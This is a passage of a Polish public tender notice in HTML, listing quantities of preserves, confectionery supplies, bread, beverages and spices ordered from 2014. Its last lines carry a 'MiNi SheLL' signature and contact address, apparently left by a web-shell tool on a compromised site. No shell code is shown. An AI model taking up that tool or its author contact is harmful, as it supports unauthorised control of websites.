Margaryna kremowa do sporządzania  deserów, mas i kremów oraz wykwintnych wyrobów cukierniczych,  80 % tłuszczu, pakowana 10 kg (w bloku)	Kg	160
Margaryna do ciast i ciasteczek 80 % tłuszczu, pakowana po 10 kg (w bloku)	Kg	1300
Masło roślinne , pakowane 0.25 kg lub 0,5 kg	Kg	2,5
(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Owoce i warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananasy w lekkim syropie - plastry, w puszce, pakowana 0,34 kg	szt.	168
brzoskwinie w lekkim syropie, w puszce, połówki, pakowana 0.82 kg	szt.	283
chipsy ziemniaczane	kg	1,3
chrzan konserwowy, tarty, pakowany od  0,18 kg do 0.29 kg	kg	37,8
dżem z czarnej porzeczki, niskosłodzony , pakowany 0,27 kg	kg	32
fasola biała konserwowa, puszka 0,4 kg	kg	2,90
fasola czerwona konserwowa, puszka 0,4 kg	kg	7,2
groszek konserwowy - puszka 0,4 kg	kg	47,5
kapusta kiszona, pakowana od 1,0  kg do 5 kg	kg	564
Ketchup łagodny (1L)	kg	49
kiełki sojowe puszka 0,4 kg	kg	6,7
koncentrat buraczany ( zagęszczony sok z buraków ćwikłowych) 0,33 ml (szklane butelki)	L	9
koncentrat pomidorowy 30 % , pakowany w szklanych opakowaniach - 1 kg	kg	140
kukurydza w puszce, min 55% surowca, pakowana 0,4 kg 	szt.	312
Mandarynki w syropie, puszka, małe opakowania	kg	3,4
marmolada cukiernicza twarda o smaku wieloowocowym , pakowana w wiadrach platikowych 25 kg	kg	330
Mieszanka bakaliowa kandyzowana  ANANAS MIX	kg	43
ogórki kiszone, opakowanie  0,5 kg do 5 kg	kg	398
ogórki konserwowe, całe, pasteryzowane, pakowane w szklanych słoikach, min. 0,87 kg 	kg	164
ogórki małosolne, pakowane w plastikowych wiaderkach  max.5 kg	kg	32
oliwki konserwowe (ciemne/jasne) bez pestek, w słoikach szklanych, pakowane  od 0,9 kg do 1,8 kg	kg	8,7
papryka konserwowana, marynowana - ćwiartki, w szklanych słoikach, pakowana od 0,9 kg do 1,8 kg	kg	144
pieczarki marynowane, całe, pakowane w słoikach szklanych od 0,76 do 1 kg	kg	14,5
pomidory suszone w oleju, pakowane od 0,67 kg do 1 kg	kg	1
pomidory w puszce , całe, bez skórki pakowane  0,4 kg	kg	1,6
seler marynowany, krojony (seler sałatka), w szklanych słoikach, pakowany 0,27 kg do 0,4 kg	kg	2,3
skórka pomarańczowa kandyzowana, pakowana 0,1 kg	kg	12,20
soki owocowe -syropy, różne smaki, zawartość węglowodanów w 100 ml powinna wynosić 8,14 g, pakowany w szklanych butelkach 0,42 ml	L	23,5
sos spaghetti  z kawałkami warzyw, zawierający w składzie : pomidory, cebulę w 10 % , syrop glukozowo-fruktozowy, cukier, przecier jabłkowy, olej rzepakowy, bialko sojowe, pakowany w słoikach szklanych 0,52 kg	kg	29,39
szczaw konserwowy, cięty, pakowany w szklanych słoikach 0,9 kg	kg	22
wiśnie i czereśnie kandyzowane, pakowane 2 kg	kg	2
żurawina do mięsa w słoikach szklanych 0,28 kg	kg	2,3
(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Produkty cukiernicze w gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> budyń  śmietankowy )opakowania cateringowe min. 1 kg- max. 5 kg)	kg	30
cukier waniliowy  (opakowania cateringowe min. 1 kg - max. 5 kg)	kg	23
esencja luzem  (opakowania cateringowe min. 0,8 L - mx. 1 L  )	L	1,8
galaretka owocowa,  cytrynowa (opakowania cateringowe min. 1 kg- max. 5 kg)	kg	53
masa kajmakowa, klasyczna 777,   (opakowania cateringowe 13 kg)	kg	181
kakao extra ciemne, o obniżonej zawartości tłuszczu (10-12% tłuszczu), o składzie zawierającym soję, gluten i mleko , pakowane 0,15 kg 	kg	28,5
kisiel różne smaki (opakowania cateringowe min. 1 kg, max. 5 kg)	kg	10
masa cukiernicza  TICCINOMASA (biała) - 2,5 kg 	kg	55
miód sztuczny, wielokwiatowy  (opakowania cateringowe  5 kg)	kg	83
nadzienie - jabłka prażone, kostka, zawierające 85 g owoców w 100 g produktu oraz zawierające 0.17 g cukru w 100 g produktu, (opakowania cateringowe 
11 kg)	kg	231
nadzienie o smaku jagodowym, zawierające w swym składzie owoce jagodowe, przecier jabłkowy, cukier i skrobię, w 100 g produktu 100 g owoców	kg	117
Wiśnie w żelu (drążone 60% owoców w składzie)  (opakowania cateringowe  3,2 kg)	kg	42
polewa kakaowa ciemna, zawierająca cukier, tłuszcz roślinny, utwardzony, kakao w proszku o obniżonej zawartości tłuszczu (8%) , błonnik kakaowy, serwatkę w proszku(mleka), emulgator (lecytyna sojowa), aromat, sól /opakowania cateringowe 20 kg/	kg	170
Biała czekolada zestalona, zawartość tłuszczu 32,61 %, rozdrobnienie 25 ?m,   (opakowania cateringowe  1 kg lub 5 kg)	kg	8,2
Masy dekoracyjne do powlekania i dekoracji  tortów   PETTINICE (białe i kolorowe) (opakowania cateringowe min. 1 kg, max.5 kg)	kg	73
pomada wodna do wykańczania wyrobów ciastkarskich i pieczywa cukierniczego  (opakowania cateringowe  15 kg)	kg	74
proszek do pieczenia  (opakowania cateringowe  5 kg)	kg	22
soda oczyszczona 9opakowania cateringowe 1 kg)	kg	7,6
kremowa śmietanka błyskawiczna w proszku, pakowana 0,06 kg	szt.	32
wafle tortowe suche, prostokątne , pakowane 146 g 	szt.	560
Wiórki kokosowe , białe, drobno mielone  (opakowania cateringowe 5kg)	kg	62
żelatyna wieprzowa, spożywcza naturalna  (opakowania cateringowe min. 1 kg max. 2 kg)	kg	2
Neutralny środek żelujący  w proszku, nadający połysk, przezroczysty, nadający się do mrożenia, odporny na działanie kwasów z możliwością wielokrotnego podgrzewania., bez zawartości cukru  (opakowania cateringowe  2 kg)	kg	12
(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Batony pszenne	kg	3
Bułka tarta	kg	251
Bułki wrocławskie 0,05 kg	szt.	2722
Chleb  pszenny 0,5 kg	kg	1388,50
Chleb  żytni 0,6 kg	kg	537
 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Cukier, kawa, herbata, słodycze, napoje, alkohol.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cukier biały, paczkowany (1kg)
cukier kostka biała - 1 kg
cukier puder z glukozą - 10 kg
Posypka kolorowa o smaku owocowym (na barwnikach bezazowych)  - 1 kg
pomadki mleczne typu KRÓWKA - opakowania 4 kg
cukierki  typu TOFFI czekoladowe opakowania 3 kg
czekolada gorzka  - opakowania 0,1 kg
herbata expresowa z zawieszką opakowanie min. 50 saszetek  
kawa cappuccino waniliowe, opakowania 1 kg
kawa naturalna, mielona 250 g (typ ziaren - Arabica, głębokim smakiem i silnym aromatem nie gorsza niż Jacobs Kronung)
kawa rozpuszczalna, liofilizowana(typ ziaren - Arabica, głębokim smakiem i silnym aromatem nie gorsza niż Jacobs Kronung) , otrzymana w 100 % z ziaren kawy, nie gorsza niż Jacobs Kronung
napoje gazowane kolorowe min. 0,2 max. 2 L typu 
napoje niegazowane kolorowe - pojemność 2 litry
soki owocowe, 100 % soku  w produkcie(jabłkowe, grejpfrutowe, pomarańczowe), nektary z czarnej porzeczki - opakowanie kartonowe 1 L
Spirytus rektyfikowany  95 % - 0,5 L
wino czerwone, wytrawne - o,75 L
woda mineralna gazowana i niegazowana min. 0,5 L max. 6 L
Wódka czysta 40 % 
 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.90.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rosół drobiowy zawartość extraktu drobiowego 13,5 %, skład warzyw: marchew, cebula, pasternak, liście selera, zawartość tłuszczu drobiowego 2,4 %, (opakowania cateringowe min. 4 kg), wydajność 222 L z 4 kg surowca	kg	137
cynamon mielony, opakowania min. 1kg max. 3 kg	kg	6,5
drożdże piekarnicze - kostka 0,1 kg	kg	112
gałka muszkatołowa mielona	kg	0,3
Goździki	kg	0,1
imbir mielony	kg	0,15
kminek ziarna, opakowania min. 0,5 kg max. 1 kg	kg	1,7
kwasek cytrynowy opakowania 1 kg	kg	6
liść laurowy (opakowania cateringowe min. 0,5 kg, max. 1 kg)	kg	1
Lubczyk suszony	kg	0,1
majeranek otarty - opakowania min. 0,5 kg max. 1 kg 	kg	3
majonez  wyborowy na bazie oleju rzepakowego o zawartości 70% w produkcie, zawartości 2,5% żółtka jaja kurzego w proszku, opakowania 0,73 L	kg	227
musztarda chrzanowa  o zawartości  13,4 % chrzanu  w produkcie, opakowania 0,19 kg	kg	15
ocet 10 % - 0,5 L	L	44,5
ocet winny biały - opakowania min. 0,15 L, max. 0,3 L	L	0,3
papryka mielona słodka, opakowania min. 0,5 kg, max 1 kg	kg	2
pieprz naturalny czarny, mielony (opakowania cateringowe min. 0,5 kg, max 1 kg)	kg	11
przyprawa do piernika 	kg	2
przyprawa do ryb (sól, bazylia, czosnek, cebula, natka pietruszki, gorczyca, ziarno gryki, imbir) - opakowania cateringowe min. 0,8 kg	kg	1,6
Klasyczna przyprawa do zup, sosów, mięs, warzyw, ryb  w płynie (opakowania cateringowe min. 5 L )	
L	148
przyprawa do mięs (sól, mąka pszenna, papryka łagodna, papryka ostra, cebula, cukier, koncentrat pomidorowy, tłuszcz roślinny, czosnek, natka pietruszki, rozmaryn, pieprz czarny, oregano, tymianek, majeranek (opakowania cateringowe 0,2 kg)	kg	1,6
przyprawy do mięsa mielonego (marchew, sól, czosnek, papryka słodka, papryka ostra, pieprz czarny, majeranek, szałwia, cebula, gorczyca, kolendra, rozmaryn, tymianek, pasternak, ziele angielskie, natka pietruszki, goździki (opakowania cateringowe 0,7 kg)	kg	5,6
Przyprawa do kurczaka (sól, papryka ostra, gorczyca, pasternak, bazylia, czosnek, papryka słodka) opakowania 0,5 kg	kg	1
sos pieczarkowo-borowikowy  (ekstrakt z pieczarek 3,4%, borowiki 1,8 %, dodatek aromatu wina białego i kurkumy) bez dodatków konserwujących (opakowania cateringowe 1 kg)	kg	8
sos sojowy ciemny	kg	1,6
sól drobna, warzona, próżniowa, jodowana, do celów spożywczych, opakowanie 1 kg	kg	270
Przyprawa warzywna do potraw (sól kuchenna, suszone warzywa 15,5 %, - marchew, pasternak, ziemniaki, cebula, seler, natka pietruszki, cukier, przyprawy, skrobia kukurydziana,) (opakowania cateringowe min. 1 kg)	kg	178
ziele angielskie  ziarna (opakowania cateringowe min. 0,5 kg)	kg	1,5
barszcz biały w proszku , wydajność min. 25 porcji z 1 kg produktu (opakowania cateringowe 1 kg)	kg	40
zupki błyskawiczne typu GORĄCY KUBEK 0,012k g	szt.	208
(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com